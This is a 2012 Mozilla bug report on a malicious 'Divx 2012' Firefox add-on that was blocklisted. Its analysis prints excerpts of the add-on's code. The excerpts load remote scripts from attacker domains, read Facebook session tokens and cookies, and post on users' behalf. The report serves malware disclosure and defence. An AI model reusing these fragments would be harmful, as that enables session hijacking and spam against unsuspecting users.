Bug 758503 - Malicious "Divx 2012" add-on
: Malicious "Divx 2012" add-on
Status: RESOLVED FIXED
:
Product: Toolkit
Classification: Components
Component: Blocklisting
: unspecified
: All All
: -- normal
: ---
Assigned To: Jorge Villalobos [:jorgev]
:
Mentors:
Depends on:
Blocks:
Reported: 2012-05-24 21:17 PDT by MarkH
Modified: 2016-03-07 15:30 PST (History)
4 users
See Also:
Crash Signature:
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments
20120524_malicious_plugin.zip (password malwares4mple) (39.23 KB, application/octet-stream)
2012-05-24 21:17 PDT, MarkH
no flags Details

Description MarkH 2012-05-24 21:17:05 PDT
Created attachment 627095 [details]
20120524_malicious_plugin.zip (password malwares4mple)

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5

Steps to reproduce:

Downloaded add-on from 


Actual results:

Report for http://pluginstall.info/2012.xpi

** Embedded and Remote Files **

install.rdf
chrome.manifest
content/script-compiler.js
content/youtube.js
http://pluginstall.info/video/script.js
http://plugin2012.info/you.js
http://plugin2012.info/viral1.js
http://plugin2012.info/ultra.js
http://plugin2012.info/ultra2.js
content/xmlhttprequester.js
content/script-compiler-overlay.xul
http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
content/skin/icon.png
content/prefman.js


** Embedded Metadata **

<em:name>Divx 2012 Plugins</em:name>
<em:version>9.4.2</em:version>
<em:targetApplication>
<em:minVersion>2.0</em:minVersion>
<em:maxVersion>10.*</em:maxVersion>
</em:targetApplication>
<em:creator>Your Tube</em:creator>
<em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL>
<em:description>videos plugins</em:description>
<em:homepageURL>http://youtube3ee.com/</em:homepageURL>
<em:updateURL>http://brownizzeee.info/test/update.rdf</em:updateURL>
...<em:updateKey>MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCUtKPOGhnhlxo7vRoSR0YC1g/Mo...


** Files Loaded **

<em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL>
...overlay	chrome://browser/content/browser.xul	chrome://youtube/content/script-com...
'chrome://youtube/content/youtube.js'
...pt type='application/x-javascript' src='chrome://youtube/content/youtube.js'></s...


** Remote Javascript Loaded **

<Description about="urn:mozilla:install-manifest">
<Description>
</Description>
<em:description>videos plugins</em:description>
</Description>
...nt/browser.xul	chrome://youtube/content/script-compiler-overlay.xul
var	scriptableStream=Components
.classes["@mozilla.org/scriptableinputstream;1"]
.getService(Components.interfaces.nsIScriptableInputStream);
.classes["@mozilla.org/intl/scriptableunicodeconverter"]
.createInstance(Components.interfaces.nsIScriptableUnicodeConverter);
scriptableStream.init(input);
var	str=scriptableStream.read(input.available());
scriptableStream.close();
var script=youtube_gmCompiler.getUrlContents(
youtube_gmCompiler.injectScript(script, href, unsafeWin);
injectScript: function(script, url, unsafeContentWin) {
var sandbox, script, logger, storage, xmlhttpRequester;
var storage=new youtube_ScriptStorage();
"(function(){"+script+"})()",
e2.fileName=script.filename;
function youtube_ScriptStorage() {
youtube_ScriptStorage.prototype.setValue = function(name, val) {
youtube_ScriptStorage.prototype.getValue = function(name, defVal) {
loadScript_you();
function loadScript_you() {
var s = document.createElement('script');
s.setAttribute("type","text/javascript");
s.setAttribute("src", "http://pluginstall.info/video/script.js");
function addScript() {
var s = document.createElement('script');
s.setAttribute("type", "text/javascript");
s.setAttribute("src", "http://plugin2012.info/you.js");
function addScript(src) {
var s = document.createElement('script');
s.setAttribute("type", "text/javascript");
var a = document.getElementsByTagName('script')[0];
addScript("http://plugin2012.info/viral1.js");
addScript("http://plugin2012.info/ultra.js");
addScript("http://plugin2012.info/ultra2.js");
var a = document.getElementsByTagName('script')[0];
addScript();
// this function gets called by user scripts in content security scope to
...eymaster/gatekeeper/there.is.only.xul'><script type='application/x-javascript' s...


** Facebook Paths Accessed **

blogs[0] = 'http://www.facebook.com/bra.toch?';
blogs[1] = 'http://www.facebook.com/bra.toch?';
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {


** Facebook Data Accessed **

var fb_dtsg = Env.fb_dtsg;
user_id = readCookie('c_user');
...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo...
var fb_dtsg = Env.fb_dtsg;
..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo...
user_id = readCookie('c_user');
var fb_dtsg = Env.fb_dtsg;
user_id = readCookie('c_user');
...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo...
var fb_dtsg = Env.fb_dtsg;
..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo...
user_id = readCookie('c_user');
var fb_dtsg = Env.fb_dtsg;
user_id = readCookie('c_user');
...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo...
var fb_dtsg = Env.fb_dtsg;
..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo...
user_id = readCookie('c_user');


** HTTP Requests **

var c = new XMLHttpRequest();
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
c['open']('POST', d, true);
var c = new XMLHttpRequest();
c['open']('POST', d, true);
var c = new XMLHttpRequest();
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
c['open']('POST', d, true);
var c = new XMLHttpRequest();
c['open']('POST', d, true);
var c = new XMLHttpRequest();
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
c['open']('POST', d, true);
var c = new XMLHttpRequest();
c['open']('POST', d, true);
var req = new this.chromeWindow.XMLHttpRequest();


** All URLs Loaded or Mentioned **

<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<em:homepageURL>http://youtube3ee.com/</em:homepageURL>
<em:updateURL>http://brownizzeee.info/test/update.rdf</em:updateURL>
// http://www.letitblog.com/code/python/greasemonkey.py.txt
// http://greasemonkey.devjavu.com/
change[i].src="http://faceredirects.blogspot.ca/?iframe";
ifra.src="http://faceredirects.blogspot.ca/?iframe"
...L='<iframe id="change" width="500" src="http://faceredirects.blogspot.ca/?iframe...
blogs[0] = 'http://www.facebook.com/bra.toch?';
blogs[1] = 'http://www.facebook.com/bra.toch?';
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
addScript("http://plugin2012.info/viral1.js");
blogs[0] = 'http://dl.dropbox.com/u/81406642/a.html?';
blogs[1] = 'http://dl.dropbox.com/u/81406642/a.html?';
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
... '<center><br><br><br><br><br><img src="http://i.imgur.com/4BDZc.gif" /><br />Pl...
...setTimeout('top.location=\'http://faceredirects.blogspot.ca/?security\';', 10000...
addScript("http://plugin2012.info/ultra.js");
blogs[0] = 'http://dl.dropbox.com/u/81406642/b.html?';
blogs[1] = 'http://dl.dropbox.com/u/81406642/b.html?';
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
... '<center><br><br><br><br><br><img src="http://i.imgur.com/4BDZc.gif" /><br />Pl...
...setTimeout('top.location=\'http://faceredirects.blogspot.ca/?security\';', 10000...
addScript("http://plugin2012.info/ultra2.js");
s.setAttribute("src", "http://plugin2012.info/you.js");
s.setAttribute("src", "http://pluginstall.info/video/script.js");
...<dd><code>http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul</code></...
...<dd><a href="https://developer.mozilla.org/en/XUL">https://developer.mozilla.org/...
...<?xml version="1.0"?><overlay xmlns='http://www.mozilla.org/keymaster/gatekeeper...


Expected results:

The add-on should not read the user's Facebook session tokens and cookies and then post messages on the user's behalf without their consent.
Comment 1 Jorge Villalobos [:jorgev] 2012-05-25 09:24:29 PDT
Id: youtubeee@youtuber3.com
Comment 2 Jorge Villalobos [:jorgev] 2012-05-25 09:27:11 PDT
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i96
